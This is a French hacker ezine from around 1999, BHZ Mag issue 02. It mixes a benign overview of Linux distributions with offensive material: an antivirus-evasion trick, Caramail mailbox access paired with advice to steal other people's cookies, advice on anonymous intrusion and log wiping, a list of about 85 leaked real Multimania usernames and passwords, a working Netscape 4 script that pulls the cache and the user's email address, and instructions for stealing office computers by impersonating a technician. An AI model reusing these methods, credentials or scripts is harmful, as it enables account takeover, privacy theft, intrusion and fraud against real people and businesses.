Copy Link
Add to Bookmark
Report

The Belgian Hackers Zone Issue 02

eZine's profile picture
Published in 
The Belgian Hackers Zone
 · 4 years ago

  

œœœœœœ õõõõõõ**** 2222
** ************** 22 22
**|********* ** ** ************* 22 22
** œœœœœ *** *** ** 666 * ___ 22 22
*|* ** *** ** 666 * / ) 22
*| * ** ** ** ** ! ) 22
*|* * ** ** ** ÝÝ œœœœœ (___) 22
*|12345678910 ù%%%%õõœœœ *** ÝÝÝ ** 22
**|* ******* ******** *** ÝÝÝ ** 22
**|* *** ** 666 * ** ÝÝ ** 22
$$|* ** ** ** ** ÝÝ ** 22
*|* * ** ** ** ÝÝ ** 22
*|** ** ** ** ** ÝÝ ** 222222222222
*/* ******** *** ** **
$$$$$$$ BHZ *** !!!!!!!!!!!!!
* ----- **** æææææææææææ
**** **** ****
The Belgian Hackers Zone !!!!!!!!!


Bienvenue dans la deuxieme edition de BHZ MAG!!!
J'espere que cette fois ci y'aura plus de lecteurs que la fois passee...
les articles sont plutot differents de la fois passee (sauf 1 ou 2)
J'espere donc que Hoper et Seb R. vont etre contents cette fois...
si y'a des trucs que vous entravez dalleque mailez moi a asmodeus@mail.be
je rappelle que une fois de plus c moi AsmodeuS qui ai fait tous ces articles
et que une fois de plus ce pourri de Flat Eric n'a rien fait.A ce jour la
seule chose qu'il a fait pour le BHZ c'est fournir un nouveau logo plus
reussi que l'ancien(fait par moi)et ben oui je suis nul en graphisme...
Encore l'aut' jour il me dit "Je prefere pratiquer des nouvelles techniques
et connaitre des nouveaux trucs plutot que de me faire chier a ecrire des
putains d'articles..."Enfin meme si lui et moi on a une vision differente
des choses,une vision differente de l'UnderGrouNd,c quand meme un pote.


The Belgian Hackers Zone : www.bhz.be.tf ou www.altern.org/bhz
Y a pas grand chose:les zines,un forum et quelques programmes "de base"
e-mail : asmodeus@mail.be : Asmodeus Flat Eric : Flat_eric@moncourrier.com


SOMMAIRE :
----------
1:Contourner un Anti-Virus
--------------------------
2.:Hack de caramail version 2!
""""""""""""""""""""""""""""""
3.:Les differentes distributions de Linux
----_________-_-_-_======_________________
4.:Comment etre reellement intracable?(spoof)
*********************************************
5.:Les mots de passe des users de Multimania!
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
6..Le bug de securite de Netscape 4(suite)
++++++++++++++++++++++++++++++++++++++++++
(7)Comment upgrader facilement son ordi
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
/_8_\Les failles de securite(spoofing et ICMP)
``````````````````````````````````````````````
9*Les intrusions
````````````````
10.Liste de proxys
''''''''''''''''''
11 Virus en .bat
´´´´´´´´´´´´´´´´
12.Lynux Myths (by Microsft)
²²²²²²²²²²²²²²²²²²²²²²²²²²²²
1/*./Comment Contourner un antivirus??
-------------------------------------
Bon d'abors vous remarquerez que j'ai mis contourner et pas tuer ou autre chose
du genre.Je ne pense pas que ca marche pour tous mais bon.J'ai trouve ca une
fois par hasard quand je faisais des essais avec le CiH.Je sais que ca marche
avec V-Unvirus (sur la boite ils disaient qu'il detecte + de 32000 virus...)
C tout simple il faut creer un repertoire avec des espaces entre les lettres
ex : C:/V I R U S/ et mettre le virus dedans.L'antivirus scannera le repertoire
C:/V et ne trouvera donc aucun virus.Je sais bien que ca marche pas avec Panda
mais si ca va avec V-Unvirus,ca doit surement aller avec d'autres aussi...00


2.:Hack de Caramail(version 2)
""""""""""""""""""""""""""""""
(La version 1 etait dans BHZ Mag nø1)
Bon deja je vous dis tout de suite qu'il faut que l'ordi sur lequel vous etes
aie un ou plusieurs cookie de caramail.Si c'est pas le cas il y aura un message
du genre "Erreur reception Cookie"(Ca arrive aussi quand votre navigateur
accepte pas les cookies)Alors vous tapez dans la barre d'adresse:
http://www14.caramail.com/scripts/contenu.exe?FOLDER=1 pour la boite de reception
http://www14.caramail.com/scripts/contenu.exe?FOLDER=2 pour les msg envoyes
http://www14.caramail.com/scripts/contenu.exe?FOLDER=3 pour les msg supprimes
Pour l'utiliser,piquez le cookie de quelqu'un ou alors allez sur un ordi de
votre ecole ou dans un cybercafe ou autre chose ou il y a plein de gens qui
passent.


3.:Presentation des differentes distributions de LiNuX
________________=========---------------_=--_-_-===---

La Debian 2.1 est la distribution preferee des utilisateurs avertis de Linux. Elle est
developpée et mise a jour de maniere completement benevole au sein du projet GNU
(Gnu's Not Unix). Elle privilegie avant tout la stabilité et la secrité du systeme.

C'est sans doute pour cette raison que la Debian n'utilise pas encore la version 2.2
du noyau mais la 2.0.36, ses promoteurs n'estimant pas le noyau 2.2 encore
suffisamment stable. Son installation qui s'effectue en mode texte est assez austere.
Toutefois les choix de configuration sont nombreux et variés. On peut par exemple,
choisir d'installer une machine serveur, de development ou pour surfer sur le Web.
Les differents paquetages de la Debian sont reputé pour leur qualité. Ainsi
l'utilisateur est certain qu'un programme installé de cette maniere sera
convenablement configuré.

Comme pour le noyau, le serveur X Window (serveur generant une fenetre
rudimentaire mais qui peut etre amelioré par une interface utilisateur graphique)
n'appartient pas a la plus recente des versions : le support des dernieres cartes
video fera par consequent defaut. Mais les utilisateurs de cette distribution sauront
ajouter eux memes les outils qu'ils desirent afin qu'elle puisse correspondre le mieux
à leurs besoins.

Helas, Debian n'etant pas une entreprise commerciale, elle ne propose pas de
support technique. Il faudra pour cela passer par une entreprise tierce ou bien
utiliser les nombreux forums de discussion du Web qui regorgent d'informations
utiles en cas de probleme.





RED HAT 6.0

La societe RedHat software n'est plus a presenter tant on a entendu parler d'elle
recemment. La version 6.0 de sa distribution represente une mise a jour majeure
fondée sur sur la version 2.2.5 du noyau de Linux. Son installation est toujours aussi
simple et rapide : elle s'effectue en une dizaine de minutes. On pourra malgres tout
lui reprocher le fait que le programme d'installation donne peu de choix de
configuration de la machine. Si l'on sait exactement ce que l'on veut, l'utilisateur
selectionnera l'installation personnalisée qui permet de choisir les differents
paquetages. Sinon, il existe toujours la possibilité d'opter pour une installation par
defaut et rajouter par la suite les elements manquants.

Pour son installation, la Red Hat 6 utilise maintenant GNO RPM (Gnome Red Hat
Package Manager), qui remplace Glint (Graphical Linux Installation Tool), car ce
dernier ne propose pas d'interface graphique. L'interface par defaut de la RedHat
est desormais Gnome accompagné du gestionnaire de fenetres Window Manager
Enlightenment qui, s'il est tres plaisant virtuellement, n'en est pas moin assez lent et
gros consommateur de ressources. On lui preferera le tres joli et sobre Window
Maker ou le bon vieux FVWM95. Il est egalement possible d'utiliser KDE au lieu de
Gnome (pas conseillé par moi car franchement Gnome + WindowsMaker c plus bo et
mieux que KDE...). Le choix se fait par l'intermediaire d'X Configurator, l'outil de
configuration du serveur X. Cette version de la RedHat inclue en standart le support
pour les machines SMP (Symetric Multi Processing) et les diques Raid (nan pas raid
le tueur de moustique !! mais Redundant Array of Inexpensive Disks), dans l'optique
de le deployer sur de gros serveurs. La version commerciale est livrée avec deux
manuels tres complet et un support de 90 jours par messagerie electronique ou
telecopie.





MANDRAKE 6.0(c celle que j'utilise)

La distribution Mandrake 6.0 s'appuie en fait sur la Red Hat 6.0. Elle a ete
developpee a l'origine par un etudiant francais, Gael Duval, qui a eu l'idee d'ajouter
à la RedHat un environnement graphique simple d'utilisation (mais moins bo que
Gnome+WindowMaker) : KDE.La Mandrake est ainsi devenue, en seulement quelques
mois, incontournable dans le paysage des distributions Linux. Cela tient
principalement au fait qu'elle est resolument tournée vers une simplicité
d'installation et d'utilisation.

Pour faire face a un tel succes, la societe Mandrake Soft a ete creee afin de
commercialiser la distribution. Pour se differenceier de la Red Hat 6.0, qui inclue
aussi l'environnement KDE que Gnome, la Mandrake 6.0 apporte un ensemble de
petits avantages. Ainsi la procedure d'installation de la distribution est disponible
dans de nombreuses langues (vingt et une au total).

Mais les grandes differences se situent dans les versions des paquetages installés. Le
noyau est une version 2.2.9 contre 2.2.5 pour la Red Hat 6.0, une librairie Glibc
2.1.1 contre 2.1 pour Red Hat, une version de Gnome plus recente, etc… En plus,
Mandrake 6.0 inclue une version 1.1.1 de KDE specialement optimisée par Mandrake
Soft.

Pour le reste, elle offre exactement les memes fonctionnalités que la Red Hat 6.0
(support des technologies SMP, Raid, etc…) La version commerciale, Mandrake
Power Pack, propose notamment sur 5 CD plus de 1800 paquetages RPM et 34
applications commerciales en version de demonstration. En outre, elle possede un
guide d'installation et d'utilisation en Francais, ainsi que 100 jours d'assistance
technique à l'installation.





OPEN LINUX 2.2

Open Linux de Caldera est la seule distribution qui dispose d'un programme
d'installation completement graphique : Lizard (Linux Wizard). Elle inclut meme une
version speciale de Partition Magic de Power Quest, afin d'aider l'utilisateur a
creer une partition Linux sans perdre ses partitions DOS. L'utilitaire Boot Magic
peut remplacer l'habituel Lilo (Linux Loader) afib de pouvoir choisir le systeme
d'exploitation sur lequel demarrer, et sa configuration est beaucoup plus aisée que
celle de Lilo. L'administration des paquetages se fait avec K Package, l'equivalent de
GNO RPM mais reservé à KDE, ce dernier etant l'environnement par defaut de la
distribution. Open Linux utilise la version 2.2.5 du noyau et est livrée en standart
avec Wordperfect 8.0 et de StarOffice 5.

L'un des points forts de cette distribution est sa possibilité d'integration dans ses
environements Netware, meme au sein d'un annuaire NDS (Novell Directory
Services). La version commerciale inclut un manuel d'installation (en anglais) et
offre un support à l'installation pendant 90 jours via le site Web de Caldera.





SLACKWARE 4.0

La Slackware est directement derivée de SLS, qui etait l'une voire la toute
premiere distribution de Linux. Il ne s'agit pas du tout d'un entreprise commerciale
mais, comme dans le cas de la Debian, d'une affaire de banevoles. Les mises a jours
ne sont donc pas frequentes.

Cependant, avec l'annonce de la version 4.0, la Slackware se met au gout du jour.
Cette evolution ravira certainement les nombreux aficionados de cette distribution
qui sont souvent des adeptes de Linux de la premiere heure.

Au niveau des paquetages, la Slackware fait dans la simplicité puisqu'il s'agit juse
d'une compression au format TGZ. Cette version 4.0 devrait inclure un noyau 2.2, la
derniere version du serveur graphique X Free ainsi que les environnements Gnome et
KDE.





SUSE 6.1

La distribution SUSE est d'origine allemande. Etant disponible dans de nombreuses
langues, elle a rapidement eu une grande popularité, particulierement en europe. La
derniere version, la 6.1, integre le noyau 2.2.5 de linux. Le programme d'installation
est particulierement bien fait et traduit en francais. Il s'agit la aussi d'une
distribution fondée sur des paquetages RPM.

A noter toutefois que certains paquetages prevus pour le Red Hat ne seront paas
toujours compatibles avec la Suse. Au niveau graphique, elle integre le serveur X
Free 3.3.3.1 et les environnements Gnome 1.0 et KDE 1.1, ce dernier etant lui aussi
d'origine allemande.

Cette distribution est livrée sur 5 CD qui regorgent de programmes de toutes
sortes, un peu comme dans le cas du Power Pack de la Mandrake. On y trouve, par
exemple, Wordperfect 8 Personal Edition, les versions de demonstration d'Adabas D
(un SGBDR), d'Applixware 4.4.1 (une suite logicielle), d'Arcad (un logiciel de CAO)
et d'Arkeia (une solution de sauvegarde). La version officielle de suse 6.1 offre un
support de 60 jours.


4.:;.,Commen etre reellemnt intracable?(Spoof)
**********************************************
-1 envoyer un email vraiment anonyme:
++++++++++++++++++++++++++++++++++++++
Les softs debile du genre anonimail ne cachent pas votre IP au serveur
donc il faut utiliser un FireWall (@tguard est le meilleur)et aussi
si possible un brouilleur d'IP(IP Jammer)c'est un programme qui est sense
brouille tout ce qui sort de votre modem mais ca marche pas toujours et
parfois ca fait planter la connexion.Ensuite il faut recuperer le plus grand
nompbre d'adresses de serveurs mails.Je pense qu'il y en a pas mal sur
Anonymiser.com et celui-ci vous permet d'envoyer des mails en passant par
30 serveurs...Cela peut paraitre beaucoup mais bon...
Maintenant il existe des traceurs d'IP qui donnerait aussi le nO de tel!
Mais pour contourner cela je suppose qu'il suffit d'utiliser un proxy ou
un FireWall.

-2 le SpOoFing
+++++++++++++++
1-iDENT spoofing (Tres lame..dumoins ce n'est pas du vrai spoofing)
2-Wingate spoofing , proxy spoofing , shell spoofing (50%)
3-Le BLiND (100% mais une seul direction)
4-BiND spoofing (le vrai, le seul, l'unique spoof a 2 directions)

1- iDENT spoofing
...wow...le spoofing pour win 95 haha super..je me connecte
sur irc avec un programme qui modifie mon ident...hum mais
mon dns reste le meme..que faire? Bon...heheh ceci est considere
comme du spoofing..mais en fait..ce n'est que l'adresse qui est
modifie..quand on se connecte sur le serveur le programme envoie
une chaine de caracteres qui fourvoie le serveur et qui vous permet
d'impressioner les petites filles dans le channel 13 and et moins..
avec une adresse bidon comme (nick)@ha.je.taime.anne11
En fait vous restez vulnerable aux attaques des DoS(Denial of
Services) ou NUKES...des floods..ect...une seule bonne application
des idents spoofs c'est que vous pouvez spoofer un op qui est sur un
bot et si vous aviez son pass alors..eehhehe vous pourriez avoir le
controle du bot pour faire une takeover hahahahahaha...ok redevenons
serieux..faire ca c'est lame... mais bon..heheheh ceux qui veulent le
faire faite le.:).

2- WiNGATE ,PROXY,SHELL
Bon..ici on ne peux parler de grosses techniques..mais plutot de
sysadmin pas vailliant qui nous aident.Ici je parle des wingates qui
nous permettent de spoofer l'adresse du wingate connecte,des proxy
et des shells qui font la meme chose. En fait on rencontre souvent
des gens qui vont sur irc, qui wingatent..ou qui run un shell UNiX pour
pouvoir nuker...c'est tres bien mais moi l'application des wingates,
proxy et des shells que je trouve la plus pratique c'est que nous
pouvons pratiquement spoofer notre presence quand nous hackons un
serveur.Je veux dire que par la combinaison suivante qui m'a
ete donner par un Conseillier senior d'un service internet
quelconques nous pouvons etre intracable..:
Notre ordi==>wingate==>wingate==>Shell==>wingate==>CiBLE
Bon il faut s'entendre intracable par traceroute et..quelques
autres commandes..bien sur si vous hackez un serveur du pentagone..:)
heheh ils ont des chances de vous retrouver..environ 50% car..les
wingates sont en fait des bugs...mais certains administrteur ne se
souciant pas de la perte de bandwith de leur reseau les laissent
ouverts...mais log les connections :) alors...si on vous log..et si
par chance pour l'intelligence qui vous pourchasse tout les wingates
etaient logges...alors bonne chance :). Bon..il faut aussi mentionner
que si vous hackez par l'intermediaire d'un shell il est bon de
savoir comment effacer les logs...bien sur il y a plein d'exploits
pour ca....utmpclean,zap,marry.....voir:www.rootshell.com.
En fait la solution est de bien couvrir ses traces..:)
Ha une autre chose a propos des wingates...certains wingates son
ouverts seulement pour vous attirer vers eux puis ensuite logger
toutes vos actions alors attention...

Pour trouver les wingates..utilisez un wingate scanner...
Proxy = meme chose
Shells = achetez en un...ou Hackez en un :)



3- Le BLiND SPOOFiNG...
Bon...je ne m'etendrai pas vraiment la dessus...le blind
spoofing est surtout utilise pour les DoS ...Nukes.. il
permet de spoofer l'adresse d'un packet.L'inconvenient
c'est que le packet reste tracable sur le reseau de routers
utiliser pour lancer l'attaque.Alors le packet est tracable..
et vu que les routers sont logges..alors :) hehehe on peut vous
retracer si le besoin s'en fait ressentir en fait le blind spoofing
repose sur le principe que le packet se dirige dans une seule direction
Alors on ne peut voir le resultat....du point de vue du
packet envoye...exemple:
J'envoie un packet spoofe a 170.90.90.90 provenant de l'adresse
120.3.2.1 ...je n'ai plus de controle sur 120.3.2.1 .
N'oublier pas que ma vrai adresse n'est pas 120.3.2.1 mais
que si on trace 120.3.2.1 et notre adresse on retrouvera qu'il
proviennent des meme routers que notre ip et si on regarde dans les logs
des routers...on retrouvera le ip de provenance..
Le blind spoofing est donc souvent utilise dans les nukes...car
nous n'avons pas besoin de recevoir un packet..pour confirmer qqch.

Encore une fois ces attaques peuvent etre loguees ou tracees mais un packet
provenant d'un blind spoof a une duree de vie egale a celle des logs que
les routers gardent...alors si vous voulez savoir combien de temps votre
securitee peux etre compromise...hum appelez votre ISP et demandez lui
combien de temps les routers gardent les logs ;) je ne sais pas pourkoi mais
ils ont refuse de me le dire hehehehe.



4- Le BiND SPOOFiNG

Hum..bon...voici le summum de la protection....que nous pouvons avoir
en fait si on est capable de reunir toutes les composantes nesessaires.
Premierement savoir :
Qu'est-ce qu'un Domain-name-server,Name server ou NS:
J'utilise la compagnie internet total.net
Pour me donner un nom en fait une addresse ip le serveur a recours
a un Name server qui m'a attribue une addresse ip ..vous avez
deviner un Name server c'est ce qui donne les ip..et la resolution
en nom comme www.yaho.com = 204.71.200.74 toutes ses conversions
en lettres sont effectuees par eux...alors imaginez le reste
si vous pouviez avoir l'acces root sur un NS :)!
Exactement..vous dever avoir..root sur un NS pour vraiment spoofer
pouvoir changer votre dns....alors.les mythes entourant le spoof sont
grandement resolus..

Et apres le root....comment fait t'on...:) utilisez un programme comme jizz
ou any-erec des BiND spoofers
Bien sur je recommande de faire cela avant de se rooter sur un NS
Notre ordi==>wingate==>shell==>wingate==>NS
dumoins si vous voulez ne pas etre logge
Et comment trouver les Nameservers...? Bien en Windows 95 ..je ne sais pas
mais en Linux ou Unix....la commande Nslookup est tres utile..!
EX:
Nslookup -type=any www.yahoo.com
non-authorative nameserver...on oublie ca....!

authorarive nameserver
ns.yahoo.com = 204.71.177.33
ect....

alors ce sont les nameservers :)
mais attention les nameserveurs sont souvent les colones vertebrales des
reseaux alors attention de ne pas les mettre down!...
En clair c comme une adresse de redirection donc...

-3 Firewall materiel:
Le firewall materiel quand a lui,est un pc relie au poste de travail par un
bete reseau.Le filtre ici c'est le pc qui s'interpose entre le poste de travail
et le reseau.C'est une bonne maniere de recycler un vieux 486 avec quelques Mo
de RAM

5.:Les mots de passe des users de Multimania
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Je vous rappelle que cest mots de passe ont étés publiés sur le web et aussi
dans Pirates Mag je pense.De toute facon ils on tous ete changes par MulTiManIa
et les users ne peuvent pas reprendre leur ancien mot de passe.Mais c'est quand
meme interessant de voir ca...

id/pass:ffq/cyberboz
id/pass:sandrinedalle/marion
id/pass:rainbow66/rainbow
id/pass:vol1/c&4rt&
id/pass:hemery/airone
id/pass:ajtfort/5mat11
id/pass:capucinem/ckyone
id/pass:amcweb/leo000
id/pass:fmarolles/fredo1
id/pass:pow/taitai
id/pass:jolko/maxime
id/pass:what01/ines007
id/pass:jchesteau/taillis53
id/pass:biergarten/daniel
id/pass:mvampouille/acetoi
id/pass:jmmdan/jmdcied
id/pass:carolinepepion/220783
id/pass:ophidie/manson
id/pass:thro/tt6835
id/pass:tiz/xavier
id/pass:landreville/monkey2
id/pass:piquery/tomate
id/pass:pmalo/poupete!
id/pass:chje/elsarener
id/pass:smidge/duke3d
id/pass:cezotronic/dragon
id/pass:codepbad31/del.buv.31
id/pass:impelang/brout456
id/pass:guigui200/clairehera
id/pass:arnaudgris/remiweb
id/pass:splif/hchich
id/pass:chezbaf/sandsand
id/pass:clainchardmarie/sylvain
id/pass:lambertl/mamour
id/pass:vstern/vst1979
id/pass:thunderde/23dethu
id/pass:llthomas1/166444
id/pass:gigla/multimaniakata
id/pass:sgelbart/chicoune
id/pass:xgaiax/VEGAN4LIFE
id/pass:grandfond/gag0810
id/pass:acigneaufeminin/paris1
id/pass:shacid/paix1037
id/pass:naturotop/bioman
id/pass:badboy1/badboy]@[
id/pass:geolalp/chartreu
id/pass:lauraider/thibault
id/pass:tiandao/mokkori
id/pass:ebk/blackice
id/pass:barrail/150360
id/pass:calasdidier/ladoux
id/pass:sashpg/pierre98
id/pass:michelhoffmann/171094
id/pass:catseyes1/Roxette
id/pass:benett/benett1
id/pass:mmarchali/220552
id/pass:orchestre/drbouka
id/pass:bertoune/151277
id/pass:guanakey/wazzup
id/pass:bclement/160680
id/pass:piccand/piou6237
id/pass:sunfire/lait55
id/pass:sycho/westgate
id/pass:mpapillon/aurelien
id/pass:ageofempire/dentdent
id/pass:depechepop/terandar
id/pass:foggier/040354
id/pass:htmld/iieiie
id/pass:taaren/quanah
id/pass:suinat/yobabyyo
id/pass:francoisgilbert/exposed
id/pass:sebastienolive/olive97
id/pass:diksa/eskive
id/pass:david09/delestre09
id/pass:cinemania/carna17
id/pass:abouyassine/test102
id/pass:prambaud/NGw780
id/pass:frenchtouch/connextion
id/pass:frencko/cel300a
id/pass:burkinaction/012485
id/pass:kadams/kadams
id/pass:ogma/youga1
id/pass:karim92/mirak23
id/pass:observatoire/hesse3
id/pass:crumble/krulll

et ca c'est la lettre que tous les utilisateurs de MuLtiManIa ont recu:

Paris le 23/06/1999

Cher(e) Membre

Nous nous sommes récemment aperçu que MultiMania offrait certaines failles de sécurité.
Ces failles, bien que mineures, auraient pu permettre des intrusions dans la base MultiMania
et ont été immédiatement colmatées.

Cependant, par mesure de sécurité nous avons décidé de modifier les mots de passe de l'ensemble
des membres de MultiMania pour assurer à chacun une totale sécurité sur son compte.

Le nouveau mot de passe qui vous a été attribué, a été envoyé à l'adresse e-mail que vous
aviez saisie sur MultiMania.

Si vous n'avez pas reçu ce mot de passe, un formulaire est à votre disposition pour le récupérer.

Si vous rencontrez un problème, vous pouvez nous écrire en passant par le formulaire prévu à cet effet.

Vous pouvez modifier ce mot de passe à votre guise, mais vous ne pourrez pas réutiliser exactement
le même mot de passe que celui que vous aviez précédemment.
Pour modifier votre mot de passe, connectez vous a l'Espace Membre accessible à partir de http://www.multimania.fr.

Parallèlement, pour vous assurer une fiabilité maximum lors de vos connexions à MultiMania,
nous avons mis en place un système sécurisé de transmission des données (SSL).
Ce système, qui se matérialise par l'apparition d'un petit cadenas au bas de votre navigateur,
vous assure une confidentialité totale lors de la transmission de vos données.
Il est maintenant présent sur l'ensemble des pages de MultiMania où vous enregistrez des
données (pages d'identification, Espace Membre, procédure d'abonnement).

Cette procédure nous a paru être la plus efficace pour vous garantir une utilisation optimale
et sûre de MultiMania.

Cordialement,

L'équipe de MultiMania

-------

6..Le bug de securite de Netscape 4(suite)
++++++++++++++++++++++++++++++++++++++++++
Dans BHZ mag nO 1 j'expliquais comment le bug fonctionnait.Mais j'ai recu des mails
de personnes qui disaient vouloir le script ou qui disaient que l'article etait
pas complet...
Le voici:

<SCRIPT>

a=window.open('wysiwyg://1/about:cache');
s='Voici quelques liens contenus dans votre cache: \n';
for(i=0;i<7;i++)

s += a.document.links[i] + '\n';
a.close();
alert(s);


a=window.open('wysiwyg://1/about:config');


mag='mail.identity.useremail = ';

mend='general.title_tips';

res=mag;

charstoread=20;


alert('Il est possible de trouver votre adresse email. Ca peut prendre un certain temps.');

function readit() {
for(i=0;i<charstoread;i++) {
t=res;

a.find(mend);
for(c=1;c<256;c++) {
t=res + String.fromCharCode(c);

if (a.find(t,true,true)) {
/* alert(c); */
res=t;

}
}
}
res=res.substring(mag.length);

a.close();
alert("L'adresse email est :\n" + res);
}

setTimeout("readit()",3000);
</SCRIPT>
_
(7)Comment upgrader facilement son ordi(et/ou se faire des thunes facilement)
- -----------------------------------------°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°

Bon alors pour commencer il faut 1-ne pas etre con
2-avoir un certain age...

Alors voila la methode:Munissez vous d'un bleu de travail ou de vetements
qui conviendraient pour un informaticien et inventez vous un nom,et meme
si vous trouvez ca necessaire faites vous une carte de visite...
Trouvez vous une 'tite entre prise ou une 'tite societe et allez y puis
baratinez les en disant que quelqu'un a demande que vous fassiez la revision
complete de leurs ordis ou mieux un test de compatibilite an 2000...
Pour faire plus vrai amenez vous avec une valise avec tournevis,CD's,pinces
et faites d'abord ler test software puis a vos tournevis...Demontez la tour
et hop a vous tout le materiel PC que vous voulez...Vous pouvez soit leur dire
que y'a un probleme avec leur matos et que vous ramenez ca chez vous pis que
vous reviendrez demain (dites leur de vous appeler(le n° sur la fausse carte
de visite)si y'a un probleme)N'hesitez pas a prendre tout ce qu'il vous faut...
Meme les ecrans!J'ai vu que dans certaines banques et dans certaines societes
ils payent des putains d'ecrans plats a leurs employes!(mais evitez les banques
...trop de cameras..)Evidemment il faut pas commencer a se marrer quand vous
leur piquez des trucs...ne fois al'abri faites l'inventaire de ce que vous avez
...si y'a des trucs dont vous avez pas besoin allez chez des magasins comme
Electro Ca$h (ils payent cash...)L'avantage de ce genre de magasins c'est qu'ils
posent pas de questions...Mais il se peut que cela soit un meilleur prix ailleur
mais personnellement je prefere pas prendre de risques...et si vous avez l'impression
apres avoir fait ca plein de fois qu'ils vous connaissent bien,soit changez de
magasin ou revendez ca a des copains ou a des cons....
Cela peut aussi servir pour l'espionnage industriel mais bon...
Les trucs a dire si on vous dit qu'ils on pas demande d'informaticiens:
-"Ah bon c'est pas ici ..(le nom de la boite en changeant un peu)...?"
-Vous telephonez quelques jours avant en essayant de trouver le nom du patron
pis vous dites "Mais pourtant c'est Mr.Patron lui-meme qui m'a dit de venir!"
___
/_8_\Les failles de securite(spoofing et ICMP)
``````````````````````````````````````````````

La faille de securite la plus connu est celle qui utilise l'IP spoofing.
On se fait passer pour une machine du reseau externe pour penetrer dans le
reseau intranet. Il s'agit de donner, en general un IP connu par la
machine attaquee, et donc on peut avoir un acces a cette machine etant
reconnue comme machine "amie". Ca permet par exemple, de pouvoir envoyer
des daemons a la machine a hacker en passant par differents filtres (comme
TCP Wrapper), parce qu'on s'est fait indentifier comme etant une machine
"amie".
Explications sur ce qu'est un daemon: on va faire un schema rapide:
un daemon est un programme qui lance des applications en arriere plan de
ce que vous faites sous Linux/UNIX. Bref creez vos propres daemons genre:
des qu'on tape le mot: "je", y'a un fichier qui s'efface dans le repertoire
que vous aurez choisi... Bref ca represente un grand trou de securite...
Mais j'en vois p'tetre qui n'aurait pas tout compris. Bon je resume, parce
qu'on est pas oblige d'avoir Linux/UNIX pour avoir des competeces sur ces
systemes.
En se faisant identifier comme la machine "amie" aupres de la machine
ciblee, on peut passer a travers des filtres de type TCP Wrapper (qui n'est
qu'un exemple parce que j'ai un schema du fonctionnement, y'en a d'autres
bien sur), et envoyer des daemons a la machine ciblee ou exploiter des
programmes de communication. Pour schematiser ce type d'attaque voici un
exemple de filtre de type TCP Wrappper:
monhost a l'@IP: 144.135.10.1
monhost/ :cat /etc/hosts.allow
fingerd: ALL : (mail -s finger-from-%h admin@monhost.mon-domaine.fr)
ALL : LOCAL
ALL : mon-domaine.fr
ALL : 114.135.10
Ainsi monhost autorise l'acces a tous ses daemons a toute machine dont
l'adresse IP commence par 144.135.10. En ayant tous les droits sur ce genre
de machines (dans l'exemple 144.135.10.1) vous pouvez envoyer des daemons, ou
bien exploiter les programmes de communications de la becane ciblee. Pour
faire croire au filtreur que vous etes ami, faut lui faire croire que vous
venez du reseau interne, et bien sur la machine que vous aurez a cibler est
144.135.10.1 (je l'ai deja dit plus haut).

Bon ca c'etait pour les filtreurs et le spoofing ainsi qu'une entrevue sur
les daemons. Car des failles de securite y'en a d'autres. C'est le
detournements de paquets IP, (Internet Control Message Protocol redirects).
Ce qu'il faut savoir c'est que les paquets redirection ICMP servent a un
routeur par defaut a indiquer l'IP d'un nouveau routeur par defaut. Ce type
d'attaque de redirection ICMP, permet le détournement des paquets ethernets,
vers un autre routeur par defaut causant ainsi la perte du paquet envoye, et
la station attaquee ne peut plus emettre ailleurs. La trame ICMP peut etre
encapsulee, dans une trame IP (juste l'adresse IP de la cible est marquee),
et donc l'attaquant peut venir du reseau externe, meme si l'emetteur est du
reseau interne. La station recevant la trame ICMP doit verifier qu'elle vient
bien de son routeur par defaut , ainsi vous devez utiliser le spoof pour vous
faire passer pour le routeur par defaut, et recevoir la trame ICMP, la station
etant en contact avec le routeur par defaut en temps normal.

En sachant que pour joindre un reseau local, les paquets IP doivent passer
par un routeur qui joint le reseau externe au reseau interne (il n'y en a pas
qu'un), il suffit de prendre possession de ce routeur et d'indiquer aux autre
routeurs que la distance entre eux et le votre est la plus petite. Ainsi pour
faciliter la rapidite du transfert de donnees ils vont faire passer les
paquets par vous.

9*les Intrusions
////////////////


Bon, vous connaissez tout, ou a peu pres tout, sur les manieres basiques de
penetrer un systeme...
On va les re-enumerer, car il y en a de nombreuses que l'on oublie. Pour
faire jouer la securite d'un reseau il s'agit de connaitre toutes ces
methodes: si vous n'en connaissez qu'un tiers ou un quart, vous n'irez pas
tres loin (c'est chiant a dire mais c'est vrai).

Attaque par virus, vers, bombes logicielles
Intrusion par Trojan horse(ou Cheval de Troie)
Intrusion par backdoors: le createur d'un programme, cree une faille
qu'il est sur d'etre le seul a exploiter.
Intrusion par spoofings de packets (on peut voir ça dans hacking d'un
routeur en images), quand on usurpe une adresse IP qui est reconnue comme
faisant partie du reseau, ou par d'autres methodes de spoofings, cf article:
"spoofing"
Espionnage de liaisons ou analyses de trafic: detournement de trames qui
circulent sur le reseau, avec ça on peut intercepter des mots de passe
Intrusions par les bugs des logiciels
Exploitation d'acces non securises: quand on demande un mot de passe style
1234, on quand on n'en demande pas!
refus d'acces, saturation de services (DENI de services), en general quand
on empeche l'acces a une ressource par flooding (!), ou bien parce que les
pass ont changes (Cf: hack d'un routeur)
Transparence excessive des annuaires: on ne vous cache rien, c'est quand
vous faites des infos requests d'un domaine sur NetworkSolutions, pour
choper les infos des dirigeants d'une entreprise, ou bien par l'annuaire:
plus simple.
Surveillance des messageries d'entreprises
Quand on ouvre son reseau d'entreprise sur l'internet, les admins ("vive
eux" hehem!!), des reseaux ne se genent pas de tout securiser (remarquez qu'ils
sont la pour ça). Donc sur un reseau intranet d'entreprise, il y a un poste avec
un modem qui a un firewall ET anti-virus active en permanence
(dans quel monde vit-on), et des parametrages de securite:
- Pas d'utilisation de type libre (on peut pas faire ce qu'on veut)
- On ne peut pas maitriser la securite (impossible de desactiver
l'anti-virus par exemple)
Et pour rejoindre ce poste au reseau internet les trames passent par un
RTC( Reseau Telephonique Commute) ou un RNIS (Reseau Numerique a Integration
de Services), ou encore un RFI (reseau a fibre optique) puis par un modem
relie a l'ISP puis a internet voire passant par un proxy.
Une autre solution de securite pour proteger le LAN prive ( reseau interne)
,consiste a mettre un routeur filtrant entre le LAN et l'ISP... celui-ci fait
un filtrage sur les champs des protocoles de communacation (style UDP, IP, TCP...).
C'est en general la solution choisie par de nombreux administrateurs.
Mais ça leur demande une bonne connaissance
